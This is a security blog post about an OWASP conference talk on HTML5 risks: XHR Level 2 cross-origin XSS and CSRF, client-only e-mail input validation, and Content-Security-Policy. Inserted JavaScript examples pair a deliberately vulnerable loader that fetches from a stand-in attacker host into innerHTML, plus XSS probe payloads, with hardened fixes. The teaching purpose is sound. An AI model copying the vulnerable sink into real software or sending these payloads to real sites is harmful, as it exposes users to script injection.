Presenting HTML5 security at OWASP AppSec APAC 2014

Hi. This is Yoshinori Matsumoto from the Watch and Warning Group.


After JPCERT/CC’s publication of a technical research report on HTML5 last October, our group has been working intensively to raise awareness of the security issues of web applications that use HTML5. We have been given opportunities to speak on this topic at various security conferences; one of them was my colleague’s presentation at "CODE BLUE", introduced on this blog earlier. This time, I would like to share some of the technical highlights of my presentation on this topic, delivered at “OWASP AppSec APAC 2014”.


OWASP and OWASP Global AppSec

If you are a security-minded web developer, I am sure you have heard of the Open Web Application Security Project (OWASP). OWASP Global AppSec is an international software security conference dealing with web application security. It is organized by the OWASP Foundation and held 4 times a year in various regions, and this time it was held in Japan for the first time, from March 17 to 20. You could tell from the number of participants that the local community was very excited about this event: around 400 people, including developers, researchers, information governance officers and business managers, joined.


My Presentation

Under the title “HTML5 Security for Web Application Development”, I discussed the security issues of web applications using HTML5, along with demonstrations of two features with inherent risks, XMLHttpRequest (XHR) Level 2 and the new HTML5 input types, and of one mitigation for injection attacks, the Content-Security-Policy HTTP header.


The first demonstration was on XMLHttpRequest (XHR) Level 2, an extension of the XHR object. While XHR Level 1 supports only same-origin requests, XHR Level 2 also supports cross-origin requests (via CORS). I showed a case study using a client browser that supports XHR Level 2. When the destination of the request is not fixed in the JavaScript but taken from input an attacker can influence, the browser can be made to send the request to a malicious website and to insert the response into the page, which results in a so-called Cross-Site Scripting (XSS) attack. I also showed another case study on a user of a file uploader vulnerable to Cross-Site Request Forgery (CSRF): XHR Level 2 can send a cross-origin multipart request that carries the user’s cookies, so even if the website itself does not use HTML5, this issue arises as soon as the user’s browser supports XHR Level 2.
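The two XHR Level 2 cases above, written out as an added example (this is not code from the presentation or from the JPCERT/CC report). It contrasts a fetch whose destination comes from untrusted input, with the response written as HTML, against a hardened version that pins the origin and treats the body as text, and adds the server-side check a file-upload endpoint needs against a cross-origin FormData upload. The origins, the widget/upload field names and the fake XHR object are assumptions made for the illustration.

```javascript
// Added example, not code from the presentation or the JPCERT/CC report.
// All origins, field names and the fake XHR below are constructed for illustration.

const TRUSTED_ORIGINS = ["https://api.example.com"]; // assumed: the only origin this page may fetch from

// Vulnerable: the URL fragment decides where the request goes, XHR Level 2 follows it
// cross-origin, and the response is written into the page as HTML. A link such as
// https://app.example.com/#https://evil.example/payload makes the attacker's HTML render.
function loadWidgetVulnerable(xhrFactory, hash, container) {
  const url = decodeURIComponent(hash.slice(1));
  const xhr = xhrFactory();
  xhr.open("GET", url);
  xhr.onload = () => { container.innerHTML = xhr.responseText; }; // DOM-based XSS sink
  xhr.send();
}

// Hardened: resolve the candidate URL against the page and accept only an allow-listed origin.
// Returns the absolute URL or null. "javascript:" URLs get origin "null" and are rejected too.
function resolveTrustedUrl(candidate, base) {
  let parsed;
  try { parsed = new URL(candidate, base); } catch { return null; }
  if (!TRUSTED_ORIGINS.includes(parsed.origin)) return null;
  return parsed.href;
}

// Returns true if a request was issued, false if the destination was rejected.
function loadWidgetHardened(xhrFactory, hash, container, base) {
  let candidate;
  try { candidate = decodeURIComponent(hash.slice(1)); } catch { return false; }
  const url = resolveTrustedUrl(candidate, base);
  if (url === null) return false;
  const xhr = xhrFactory();
  xhr.open("GET", url);
  xhr.onload = () => { container.textContent = xhr.responseText; }; // text, never markup
  xhr.send();
  return true;
}

// CSRF side: an attacker's page can POST multipart/form-data cross-origin with the victim's
// cookies via FormData + XHR Level 2, whether or not the target site uses HTML5 itself.
// The upload endpoint must therefore check the browser-set Origin header (falling back to
// Referer) and a per-session anti-CSRF token carried in the form body.
function uploadRequestAllowed(headers, fields, sessionCsrfToken, siteOrigin) {
  const origin = headers.origin ?? (headers.referer ? new URL(headers.referer).origin : null);
  if (origin !== siteOrigin) return false; // a forged XHR carries the attacker page's Origin
  return typeof fields.csrf_token === "string" && fields.csrf_token === sessionCsrfToken;
}

// Constructed stand-in for XMLHttpRequest so the demo runs without a browser.
function makeFakeXhr(responsesByUrl) {
  return () => ({
    url: null, responseText: "", onload: null,
    open(_method, url) { this.url = url; },
    send() { this.responseText = responsesByUrl[this.url] ?? ""; if (this.onload) this.onload(); },
  });
}

// Demo run on constructed data.
const responses = {
  "https://evil.example/payload": "<img src=x onerror=alert(1)>",
  "https://api.example.com/widget": "Hello from the API",
};
const victim = { innerHTML: "", textContent: "" };
loadWidgetVulnerable(makeFakeXhr(responses), "#https://evil.example/payload", victim);
console.log("vulnerable page now contains:", victim.innerHTML);
const safe = { innerHTML: "", textContent: "" };
console.log("hardened page issued the request:",
  loadWidgetHardened(makeFakeXhr(responses), "#https://evil.example/payload", safe, "https://app.example.com/"));
```

The hardened loader rejects protocol-relative URLs (`//evil.example/...`) and look-alike hosts (`api.example.com.evil.example`) as well, because the comparison is on the parsed origin rather than on a string prefix.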


The next demonstration was on <input type="email">, one of the new input types in HTML5. It is intended to give better input control and validation by restricting what the user enters to the format of an e-mail address. However, this restriction is enforced only in the browser: it can easily be bypassed by editing the HTML source or by sending a request directly to the website. I showed how simply this is done by editing the HTML with a web development tool, namely Firebug. Thus, this input type must not be relied on as a security measure; the input still has to be validated on the server.
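Server-side validation for the address the browser was supposed to have checked, as an added example (not code from the presentation). The regular expression is the one the HTML standard itself gives for a "valid e-mail address" for type="email" (it deliberately accepts `user@host` with no dot), so the server enforces the same rule the browser applies when it has not been tampered with. The form field names and the two request bodies, one from a well-behaved browser and one forged after removing the type="email" restriction, are constructed for this illustration.

```javascript
// Added example, not code from the presentation. Field names and request bodies are constructed.

// The HTML standard's regular expression for a "valid e-mail address" (type="email").
// It is intentionally looser than RFC 5322 and, for example, accepts "a@b".
const EMAIL_RE =
  /^[a-zA-Z0-9.!#$%&'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/;

function isValidEmail(value) {
  return typeof value === "string" && value.length <= 254 && EMAIL_RE.test(value);
}

// <input type="email" multiple> submits a comma-separated list; every item must be valid
// and the list must not be empty.
function isValidEmailList(value) {
  if (typeof value !== "string") return false;
  const items = value.split(",").map((s) => s.trim());
  return items.length > 0 && items.every(isValidEmail);
}

// Server-side handling of an application/x-www-form-urlencoded body. The browser's
// constraint validation never ran for a request built by hand or edited in a dev tool,
// so nothing that arrives here is trusted. Returns the decoded fields and a list of errors.
function validateSignup(rawBody) {
  const fields = new URLSearchParams(rawBody);
  const errors = [];
  const email = fields.get("email") ?? "";
  const name = fields.get("name") ?? "";
  if (!isValidEmail(email)) errors.push("email: not a valid e-mail address");
  if (name.length === 0 || name.length > 100) errors.push("name: required, at most 100 characters");
  return { ok: errors.length === 0, email, name, errors };
}

// Constructed request bodies: what a browser sends after its own type="email" check,
// and what arrives when the check was removed and an XSS probe is sent as the address.
const BROWSER_BODY = "email=user%40example.com&name=Yoshi";
const FORGED_BODY = "email=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&name=x";

console.log(validateSignup(BROWSER_BODY)); // ok: true
console.log(validateSignup(FORGED_BODY));  // ok: false, errors: ["email: not a valid e-mail address"]
```

Rejecting the forged address does not replace output encoding: a value that passes this regex can still contain characters such as `'` or `+` that matter in other contexts, so the address is validated here and escaped again wherever it is rendered.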


The last demonstration was on the Content-Security-Policy HTTP header, which mitigates content injection vulnerabilities such as XSS. By sending this header, a website owner declares a whitelist of trusted content sources and instructs the browser to execute or render resources only from those sources. I demonstrated how this works as a client-side safety net by injecting a script that loaded from a cross-site origin not on the whitelist; the browser refused to execute it.
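To make the blocking decision in that demonstration concrete, here is an added example (not code from the presentation) that evaluates the `script-src` / `default-src` part of a Content-Security-Policy header for a given script URL, and shows a weak policy that would have let the injected script run beside a strict one that blocks it. It is a deliberate simplification: only keyword, scheme and host sources are handled, with no nonces, hashes or path matching, and explicit default ports are not normalized. The page origin, the CDN host and both policies are assumptions for the illustration.

```javascript
// Added example, not code from the presentation. Simplified CSP evaluator:
// keyword, scheme and host sources only (no nonces, hashes or path matching).
// The page origin, the CDN host and the policies are constructed.

const PAGE_ORIGIN = "https://www.example.com"; // assumed origin of the protected page

// Weak: 'unsafe-inline' and '*' mean any injected inline or external script runs.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' *";
// Strict: scripts only from the page itself and one CDN; everything else falls back to 'none'.
const STRICT_CSP = "default-src 'none'; script-src 'self' https://cdn.example.com; img-src 'self'";

// "script-src 'self' https://x" -> Map { "script-src" => ["'self'", "https://x"] }
// Per the spec, a repeated directive is ignored; the first occurrence wins.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!policy.has(key)) policy.set(key, sources);
  }
  return policy;
}

// script-src falls back to default-src; null means the policy does not restrict scripts.
function effectiveSources(policy, directive) {
  return policy.get(directive) ?? policy.get("default-src") ?? null;
}

// Does one source expression match an absolute URL (a parsed URL object)?
function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === pageOrigin;
  if (s === "*") return true;
  if (s.startsWith("'")) return false;                           // other keywords never match a URL
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s; // scheme-source, e.g. "https:"
  // host-source: [scheme://]host[:port], where host may start with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const wantScheme = scheme ? scheme + ":" : new URL(pageOrigin).protocol; // no scheme: page's scheme
  if (url.protocol !== wantScheme) return false;
  const hostOk = wildcard ? url.hostname.endsWith("." + host) : url.hostname === host;
  if (!hostOk) return false;
  if (port && port !== "*" && url.port !== port) return false;
  return true;
}

// Would the browser load <script src=scriptUrl> under this header?
function externalScriptAllowed(header, scriptUrl, pageOrigin = PAGE_ORIGIN) {
  const sources = effectiveSources(parseCsp(header), "script-src");
  if (sources === null) return true;
  const url = new URL(scriptUrl);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Would an injected inline <script>...</script> run under this header?
function inlineScriptAllowed(header) {
  const sources = effectiveSources(parseCsp(header), "script-src");
  if (sources === null) return true;
  return sources.some((s) => s.toLowerCase() === "'unsafe-inline'");
}

// Demo: the cross-site script from the demonstration against both policies.
const INJECTED = "https://evil.example/payload.js"; // constructed attacker URL
console.log("weak policy lets it load:  ", externalScriptAllowed(WEAK_CSP, INJECTED));   // true
console.log("strict policy blocks it:   ", !externalScriptAllowed(STRICT_CSP, INJECTED)); // true
console.log("strict blocks inline too:  ", !inlineScriptAllowed(STRICT_CSP));             // true
```

The strict policy is what turns CSP into a safety net: with `'unsafe-inline'` or `*` in `script-src`, the header is present but an injected script is still executed, which is the common misconfiguration to check for when reviewing a deployment.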


A photo of me speaking at OWASP AppSec (taken by koyhoge)


For more information about my presentation, please refer to the slides here.


Research report (in English) on HTML5 security to be published

HTML5 has given us the opportunity to create richer, more interactive websites. However, using HTML5 without understanding its inherent risks may lead to unintended results, so we need to understand its security issues carefully before using these features. JPCERT/CC’s research report on this matter is intended to provide a basic reference for web security researchers and developers. It is available only in Japanese for now, but the English version will be published at the end of May. We will let you know via this blog, so stay tuned!


Thank you!

- Yoshinori Matsumoto